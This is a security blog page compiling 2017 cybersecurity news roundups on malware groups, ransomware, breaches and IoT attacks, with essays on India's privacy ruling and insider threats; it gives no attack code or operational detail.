Tuesday, December 26, 2017

iNews - Around The World This Week

                       

Date – 24th December, 2017
1)     Russia's Fancy Bear APT Group Gets More Dangerous – Fancy Bear, the Russian advanced persistent threat group associated with the infamous intrusion at the Democratic National Committee last year among numerous other break-ins, may have become just a little bit more dangerous. Encryption and code refreshes to group's main attack tool have made it stealthier and harder to stop, ESET says. The fourth and latest version of the malware comes with new techniques for obfuscating strings and all run-time type information. The techniques, according to ESET, have significantly improved the malware's encryption abilities. The Fancy Bear/Sednit group also has upgraded some of the code used for command and control (C&C) purposes and added a new domain generation algorithm (DGA) feature for quickly creating fallback C&C domains.

2)     Cybersecurity: A priority area for the Indian Government - India’s rapid transition towards digital economy coupled with national projects like Digital India, Smart Cities, National Broadband Network and so on are altering the digital landscape rapidly with direct impact on governance, transparency, and accountability. With the drive towards a digital economy, a large amount of consumer and citizen data will be stored digitally, and many transactions will be carried out online, by individuals, companies, as well as government departments. This rapid change towards a digital environment has brought to fore the challenges of certain security risks and concerns, particularly to human and nation’s cybersecurity.

3)     Comprehensive Endpoint Protection Requires the Right Cyber Threat Intelligence - A recent report from Grand View Research predicts that the cyber threat intelligence (CTI) market will reach $12.6 billion by 2025. This growth in demand isn't surprising when you consider the ongoing success of so many high-profile and extremely damaging attacks. This climate of increasingly sophisticated breaches has moved many organizations — particularly, those that handle and retain sensitive data — to upgrade their cybersecurity measures by adding CTI and incident forensics. CTI falls into three main categories -- tactical, operational, and strategic -- and answers questions related to the "who, what, and why" of a cyber-attack.

4)     Fileless Malware Attacks Hit Milestone in 2017 - Fileless malware attacks using PowerShell or Windows Management Instrumentation (WMI) tools accounted for 52% of all attacks this year, beating out malware-based attacks for the first time, according to Carbon Black's 2017 Threat Report. Non-malware attacks account for the majority of all attacks this year, and ransomware grows to a $5 billion industry, new data shows. Kryptik, Strictor, Nemucod, Emotet, and Skeeyah were the five top malware families this year, according to the report. And the top three industries hit this year by malware authors included finance, healthcare, and retail.

5)     Google Sheds Light on Data Encryption Practices - Google explains the details of how it secures information in the cloud and encrypts data in transit. Following a year of major cyberattacks and security threats, Google has published two whitepapers to explain how it secures data. One focuses on encryption of data in transit; the other on service-to-service communication using Application Layer Transport Security (ALTS).

6)     What's next for cybersecurity in 2018? - We live in a world that is networked together, where companies rely on networked systems and their data is stored in the cloud. The year 2018 will bring more connectivity, digital transformation initiatives, and data to companies, along with a number of new cybersecurity threats and landscape changes making cybersecurity one of the most crucial issues that need to be addressed in the present scenario.

7)     CROOKS SWITCH FROM RANSOMWARE TO CRYPTOCURRENCY MINING - Criminals behind the VenusLocker ransomware have switched to cryptocurrency mining in their latest campaign targeting computer users in South Korea. Instead of attempting to infect targeted computers with ransomware, the group is now trying to install malware on PCs that mines for Monero, an open-source cryptocurrency. Researchers said the shift by threat actors is also spurred by anti-ransomware mitigation efforts that have made infecting systems with malware harder.

8)     Digital Transformation Emboldens Cyber Adversaries—Can Cybersecurity Keep Up? - Businesses are accelerating their digital transformation, seeking to leverage their online presence to enrich products, deepen customer relationships, and boost their brand ecosystems. However, with this rapid growth comes difficulty. As organizations expand into digital channels, their digital footprint, i.e., all their external-facing assets including websites, email servers, social landing pages, and pages created outside proper protocol, also expands to potentially unmanageable proportions.

9)     The Internet of Things Is Going to Change Everything About Cybersecurity - Cybersecurity can cause organizational migraines. In 2016, breaches cost businesses nearly $4 billion and exposed an average of 24,000 records per incident. In 2017, the number of breaches is anticipated to rise by 36%. The constant drumbeat of threats and attacks is becoming so mainstream that businesses are expected to invest more than $93 billion in cyber defenses by 2018. Even Congress is acting more quickly to pass laws that will — hopefully — improve the situation. Despite increased spending and innovation in the cybersecurity market, there is every indication that the situation will only worsen. The number of unmanaged devices being introduced onto networks daily is increasing by orders of magnitude, with Gartner predicting there will be 20 billion in use by 2020.

10)  How AI is the Future of Cybersecurity - The frightening truth about increasingly common cyber-attacks is that most businesses and the cybersecurity industry itself is not prepared. Beyond the lack of preparedness on the business level, the cybersecurity workforce itself is also having an incredibly hard time keeping up with demand. By 2021, there are estimated to be an astounding 3.5 million unfilled cybersecurity positions worldwide.


Courtesy - Ivalue.



Thursday, December 21, 2017

Right to Privacy:

Right to Privacy: Why This Is a Big Win for People and Security of Their Personal Data

“You can’t have privacy without security” Larry Page, Google’s CEO, famously said at a TED Conference, a few years ago.
Today, closer home, that rings true. 
A few months ago when Right to Privacy found its way into the Indian Constitution, it marked a great first step towards recognizing the increasing—and often neglected—need to strengthen security to protect data and privacy.
Never before has there been a clarion call to create a robust regime for data protection. That’s something the Supreme Court has demanded of Indian organizations and the government. I think that’s quite significant.
That presents a remarkable opportunity for Indian organizations to step up their security efforts, and at the same time, build a culture that upholds the need to protect customer data. 
It evidently means here’s a chance for Indian companies to create a solid framework and a strong cybersecurity policy that ensures data protection. That, in itself, is a big win for the privacy of personal data.
Much to Gain
In the age of social media and e-commerce, as data increasingly becomes a commodity, protecting this data also becomes an imperative.
Simply put, the more important data becomes, the more important are the tools to protect data.
And when customers are confident that their data is in safe hands, they are more than willing to part with it. For businesses, this is an indicator of customer trust, which boosts customer retention and new customer acquisition, leading to increased revenue.
Recently, Nasscom’s President R. Chandrashekhar said that the Supreme Court ruling significantly boosts India’s attractiveness as a safe destination for global sourcing which according to him is “another win”. As a growing digital economy, that’s great news for Indian businesses who can take advantage of increased customer confidence. 
Outside Indian shores, the European Union’s General Data Protection Regulation (GDPR) requires all businesses—across the world--collecting data of EU citizens to become fully accountable for protecting any data categorized as ‘personal.’ With the Right to Privacy ruling, Indian businesses that cater to the European market will feel a step closer to ensuring they comply with GDPR.
Protecting Customer Privacy
In order to preserve the essence of privacy, Indian organizations need to provide an increased sense of visibility and control over confidential customer data.
To do so, they need to first recognize and assess the hands that hold customer data: Your employees.
That means there needs to be an increased focus on the people who create, touch and move customer data. One way to do that is to turn to Behavioral Analytics. It helps organizations monitor how their employees are handling customer data and detect suspicious behaviour.
That’s even more pertinent now that customer data has become the lifeline of most organizations. Industries like telecom, financial and healthcare services, e-commerce firms and government agencies that collect a large amount of sensitive personal data will have to re-evaluate their data strategy.
They will have to provision for new norms that vow to protect customer data and privacy, first and foremost. The Right to Privacy ruling has opened new doors for businesses by providing an opportunity to strengthen security to protect privacy, and thereby gain customer confidence.

Monday, December 18, 2017

iNews - Around The World This Week

1)     TRITON Malware Targeting Critical Infrastructure Could Cause Physical Damage – Security researchers have uncovered another nasty piece of malware designed specifically to target industrial control systems (ICS) with a potential to cause health and life-threatening accidents. Dubbed Triton, also known as Trisis, the ICS malware has been designed to target Triconex Safety Instrumented System (SIS) controllers —an autonomous control system that independently monitors the performance of critical systems and takes immediate actions automatically, if a dangerous state is detected. According to separate research conducted by ICS cybersecurity firm Dragos, which calls this malware "TRISIS," the attack was launched against an industrial organization in the Middle East.

2)     Newly Uncovered 'MoneyTaker' Hacker Group Stole Millions from U.S. & Russian Banks - Security researchers have uncovered a previously undetected group of Russian-speaking hackers that has silently been targeting Banks, financial institutions, and legal firms, primarily in the United States, UK, and Russia. In the past 18 months, the hacking group is believed to have conducted more than 20 attacks against various financial organizations—stolen more than $11 Million and sensitive documents that could be used for next attacks. Since its first successful attack in May last year, MoneyTaker has targeted banks in California, Illinois, Utah, Oklahoma, Colorado, South Carolina, Missouri, North Carolina, Virginia and Florida, primarily targeting small community banks with limited cyber defenses.

3)     Security Flaw Left Major Banking Apps Vulnerable to MiTM Attacks Over SSL - A team of security researchers has discovered a critical implementation flaw in major mobile banking applications that left banking credentials of millions of users vulnerable to hackers. The affected banking apps include HSBC, NatWest, Co-op, Santander, and Allied Irish bank, which have now been updated after researchers reported them of the issue. SSL pinning is a security feature that prevents man-in-the-middle (MITM) attacks by enabling an additional layer of trust between the listed hosts and devices. When implemented, SSL pinning helps to neutralize network-based attacks wherein attackers could attempt to use valid certificates issued by rogue certification authorities.

4)     Here's where 'Smart Hospitals' will make big tech investments in the near future - Building on top of today’s digital infrastructure, Smart Hospitals will focus on patient experience, outcomes, the Triple Aim and they’ll make expensive acquisitions between now and 2025. Smart hospitals optimize, redesign, or build new clinical processes, management systems and potentially infrastructure, enabled by underlying digitized networking of interconnected assets, to provide a valuable service or insight, which was not possible or available earlier, to achieve better patient care, experience, and operational efficiency. Digital transformation is happening in almost every industry and healthcare is no exception. Analyst house IDC earlier this year pegged the global DX market at escalating as high as $20 trillion in the coming years.

5)     The next big thing in pharmacy supply chain: Blockchain - With $200 billion lost to counterfeit drugs annually and patient safety issues, a chain-of-custody log that blockchain could enable holds promise. Blockchain has the potential to transform healthcare in general and the pharmacy supply chain in particular. The distributed ledger technology could offer legislative, logistical and patient safety benefits for pharmaceutical supply chain management. From a regulatory perspective in the United States, blockchain technological and structural capabilities, in fact, extraordinarily map to the key requirements of the Drug Supply Chain Security Act.

6)     Healthcare Faces Poor Cybersecurity Prognosis - The healthcare industry is underestimating security threats as attackers continue to seek data and monetary gain. Threat actors rarely attack with the intent of causing physical harm, most are looking for financial gain. eSentire reports patient records are worth between $0.05 and $2.42 USD each. Attackers can sell them on the Dark Web, use them for tax fraud or blackmail, or for conducting spear phishing campaigns. Opportunistic attacks are common because of the amount of vulnerable devices.

7)     As India Surveys Bitcoin Exchanges, West Toughens Its Regulations - Once voiced by a cryptocurrency enthusiast, “Bitcoin will do to banks what email did to the postal industry” has now been raised by Israel’s Prime Minister Benjamin Netanyahu while speaking of cryptocurrencies, exchanges and cryptocurrency regulations. “Is the fate of banks that they will eventually disappear? Yes. The answer is Yes. Does it need to happen tomorrow? And do we need to do it through Bitcoin? That’s a question mark!” stated the PM.

8)     Kaspersky Lab Detects 360,000 new Malicious Files Daily - The number of daily detected malicious files reflects the average activity of cybercriminals involved in the creation and distribution of malware. The number of daily detected malicious files reflects the average activity of cybercriminals involved in the creation and distribution of malware. This figure was calculated for the first time in 2011 and totaled 70,000 at that time. Since then it has grown five-fold, and as the 2017 data shows, it is still increasing. Most of the files identified as dangerous fall into the malware category (78 percent). However, viruses – whose prevalence significantly dropped 5-7 years ago, due to their complex development and low efficiency - still constitute 14 percent of daily detections.

9)     USB Encryption and Security Falls Well Short - A recent survey from Apricorn of more than 400 IT professionals from industries including education, finance, government, healthcare, legal, manufacturing, retail and manufacturing, reveals that most employees use USB drives, but that companies are leaving themselves open to data breaches and leaks by not effectively monitoring these devices and the data that gets written to them. However, eight out of 10 employees use non-encrypted USB drives such as those received free at conferences, tradeshow events or business meetings, which could be easily lost or stolen and fall into the wrong hands, or introduce malware into a company’s host system.

10)  We need to talk about mathematical backdoors in encryption algorithms - Governments and intelligence agencies strive to control and bypass or circumvent cryptographic protection of data and communications. Backdooring encryption algorithms is considered as the best way to enforce cryptographic control. Security researchers regularly set out to find implementation problems in cryptographic algorithms, but not enough effort is going towards the search for mathematical backdoors, two cryptography professors have argued.


Credits - Nagesh of Ivalue.

Tuesday, November 21, 2017

Another Business Email Compromise

Export company’s email ID hacked, $36.8k siphoned off

Friday, October 6, 2017

To Err is Human or The Insider?

What’s the similarity between Bradley Manning and Edward Snowden? Well, apart from the fact that both disclosed sensitive information about the US government or its various arms and were hailed as “whistleblowers” by some and slammed and persecuted by their own government, they were also quintessential “insiders”. Or, to put it simply, people who ended up leaking classified information about the very same organization that they worked for.

Surprised? Welcome to the world of insider threats, a kind that is perhaps the most under-appreciated of cyber threats since they mostly fly under the radar as stories about hackers and other criminal actors grab the headlines.

According to the SANS Institute, one-third of enterprises have suffered from an insider caused breach, with possible losses from each incident amounting to more than $5 million. Research firm Gartner says that more than 70% of unauthorized access to data is committed by an organization's own employees. These are good enough indicators to gauge the level of threat that insiders pose.

Insider attacks, be it from a disgruntled employee or an absent-minded manager, are more insidious because they betray the trust the organization has in its employees and partners. They are also harder to detect and take longer to discover than any other type of threat. Also, this threat simply can’t be wished away as every organization needs employees and partners who will need access to sensitive information to do their jobs effectively.

Besides, not all insiders have a malicious intent. Often, data loss happens due to unintentional mistakes made by people—accidental insiders—or users whose credentials have been compromised or stolen—compromised insiders.
Alas, the existing approach to information security relies heavily on protecting the technology infrastructure, which while needed will not solve this insider threat.
So, what can organizations do about it? How can they counter such threats?
The Human Point
The answer perhaps lies in having a more human-centric approach. To protect and secure data from such insider threats, a new approach is required where the focus needs to be on understanding the points in which trusted people – employees, partners, and contractors – interact with critical business data and intellectual property. It is human points of interaction where businesses see critical data as most valuable. And these are precisely the points where the data is also the most vulnerable.
Learning how users interact with critical data has to become a priority for security professionals. And while there’s agreement that understanding behavior and intent is vital to cyber security, most security professionals are unable to do so effectively as it is an entirely new security paradigm.
To effectively counter insider threats, intelligent integrated systems are needed that provide visibility into user behavior and uncover intent by providing the context behind a user’s actions. These systems of integrated solutions, when coupled with comprehensive cyber security programs, can secure today’s mobile workforce, reduce the incident management burden on IT teams, increase the value of new security investments, and provide proactive security that promotes innovation within the organization.
It’s time businesses start adopting this new approach to security and have intelligent systems that allow good employee behavior and facilitate business while stopping bad cyber behaviors.

And the time to start was perhaps yesterday. Else, tomorrow the next Bradley Manning or Edward Snowden might come from your organization.
reproduced from - https://tinyurl.com/y9jjf467

Sunday, January 8, 2017

Issue 98- Week of Jan 2nd


1.      KillDisk - the world's biggest Ransomware?: KillDisk malware was originally used in the Ukraine energy attacks of 2015. Now researchers have found a Linux variant of it, which makes the Linux machine unbootable. It also demands an unusual high Ransom of 222 BTC (approx. $200K). Prevention is the best solution to Ransomware. Regular Backups & good Web Security solutions recommended.

2.      Koolova Ransomware: Users infected with this Ransomware can obtain the decryption key for free if they read two articles about Ransomware. This certainly is not the best way to build awareness about Ransomware. 'Popcorn time', another interesting Ransomware in news last month required the victim to infect two others to obtain the decryption key for free.

3.      Ransomware in Schools: In UK, cybercriminals pretending to be Govt. officials have been cold-calling schools to obtain email ids of key staff, to email them 'Supposedly' important docs. These docs actually contain malware which encrypts the school's machines. The hackers then demand a ransom of £8000. Similar scams are run by sending malware infected fake POs to sales organizations and fake resumes to HR depts..

4.      Mongo DB under attack: MongoDB had an vulnerability in which the database could be accessed without any authentication. A patch was later made available but some of the admins did not patch. Hackers are now deleting such databases before making a copy, they are willing to return the data for a Ransom of 0.2BTC ($150). Thousands have been affected; Upgrade of MongoDB strongly recommended.

5.      Tech support scam hits Mac: Users not on the latest Mac OS are prone to this malware infection, which opens several draft email windows with subject line "Virus detected call support on +1-800-xyz). This goes on till the laptop suffers memory issue and crashes. The trick is to get the victims to call, scare them to sell support which they really do not need. See image below.

6.      D-Link Sued: After the recent massive DDoS attacks, the US watchdog FTC has sued D-Link for its poor security. This move by FTC will go a long way in improving the security of IoT devices which the manufactures have not taken very seriously - most likely to keep their costs low. Usage of default passwords allows hackers to break-in easily; it is strongly recommended to avoid using default passwords.

7.      FTC announces $25K reward: Keeping in mind the role IoT played in the recent massive DDoS attacks, FTC has announced a reward of $25K to anyone who can create a solution that will patch all vulnerable IoT devices. A serious challenge in IoT is that many of these devices do not have ability to be patched remotely. Issue 88 - we saw a Chinese company admitting its products were misused to launch the DYN attack, later the company recalled some of the devices.

8.      Netgear announces Bug Bounty program: Last week, Netgear launched its Bug Bounty program in which it will reward hackers up-to $15K for responsible reporting of flaws found in its products. Several companies offer such programs the biggest one being that of Zerodium which offers $1.5M for bugs in iOS 10 Zero-day exploits.

9.      Critical RCE bugs patched: Websites using PHPmailer/ Swiftmailer/ Zendmail, were vulnerable to a RCE (Remote Code Execution) bug. Using contact/registration forms - hackers could run arbitrary code thereby compromising the site. All the vulnerabilities have now been patched. Admins can consider updating.

India's pitch to Google: India's IT minister told the visiting Google CEO to play a 'more meaningful' role in countering cyber threats. Experts are not sure what exactly a company like Google can do to increase cyber security. As India is rapidly moving towards Digitalization - the cyber-threats will grow disproportionately. 'Digital India' will slow down if these threats become mass and real.


Sunday, January 1, 2017

Issue 97- Week of Dec 26th - Happy New Year

Issue 97- Week of Dec 26th

1.      US Election hacking fallout: US expelled 35 diplomatic personnel from Russia embassy last week, it is alleged these Russians interfered in US presidential election by hacking the DNC. Russia did not do the usual tit for tat but it trolled President Obama by calling him a Lame duck.

2.      Super Mario Run APK is a malware: Nintendo's 'Super Mario Run' was released recently for iOS devices only. Some of the Mario lovers went looking for the Android version of the game outside the Goggle play store and ended up with malware. This malware can take full control of the Android device. It is advised to wait for the official version on Play Store.

3.      Lithuania computers infected with Russian Spyware: Reuters reports that Lithuania has accused Russia of cyber-attacks on it Government networks. Lithuania fears Russia is trying to infiltrate its political sphere. Russia has rejected this as Laughable and unsubstantiated. Meanwhile in Germany, its intelligence believes Russia may interfere in its National elections in 2017.

4.      Application for Marijuana seller's details leaked: Recreational marijuana is legal in Nevada. Details from the 11700 reseller applications that Nevada state government had received was easily accessible via Google on the State Government's Website. Experts are not willing to call this a cyber-hack. The site is currently down.

5.      Another DDoS attack: For most part of 2016 - DDoS attacks was launched using Mirai botnet in hacked IoT devices. Last week - A 650Gbps attack was launched using a new botnet called Leet Botnet. Issue 84 - A 1.5Tbps attack was launched on France-based hosting provider OVH and Issue 87 - DNS provider DYN suffered massive DDoS attack.

6.      Android Trojan infects Wi-Fi router: A new Android Trojan called Switcher comes in disguised apps and does not affect the device but targets the Wi-Fi router it is connected to. It changes the DNS settings of the router to redirect traffic to malicious websites. Issue 95 - we saw something similar called 'DNS Changer' - where the router was attacked via a PC. Issue 94 - we saw Stegano Malvertising redirecting traffic.

7.      Amazon Echo's help required to solve murder case: Amazon Echo is a smart device that responds to voice commands. This device was being used in a home where a murder took place. The police have issued a Warrant to Amazon to handover the voice recordings during the suspected time of murder. Amazon has declined. Sounds very similar to Apple v/s FBI case wherein Apple declined to unlock the San Bernardino terrorist's iPhone.

8.      InterContinental Hotels may have been hacked: After a debit and credit card fraud pattern was found at some of the InterContinental properties - the hotel has launched an investigation.  Kimpton Hotels & HEI Hotels & Resorts (which operates Marriott, Hyatt and Sheraton and Westin hotels) recently suffered PoS breach.

9.      Critical flaws in PHP 7 detected: Experts have found 3 critical 'Zero Day' vulnerabilities in PHP 7. Two of the flaws allow hackers to take full control of the web server and steal data. The third flaw helps in DoS attack shutting down the server. PHP was notified about these flaws in Sep and as of now they all have been patched.

10.   Security and demonetization: Recall the story we discussed in Issue 49 - wherein a Bangalore businessman's account was hacked and $70K was stolen. The hackers were able to very easily obtain a duplicate SIM card of the businessman's phone number and then hack the bank account as the OTP was now being delivered to the criminals. With Demonetization and Digital India - thousands are embracing e-wallets and online transactions every day. Criminals now have a much wider attack surface, one should stay alert to prevent such hacks.


Source - idtheftcenter.org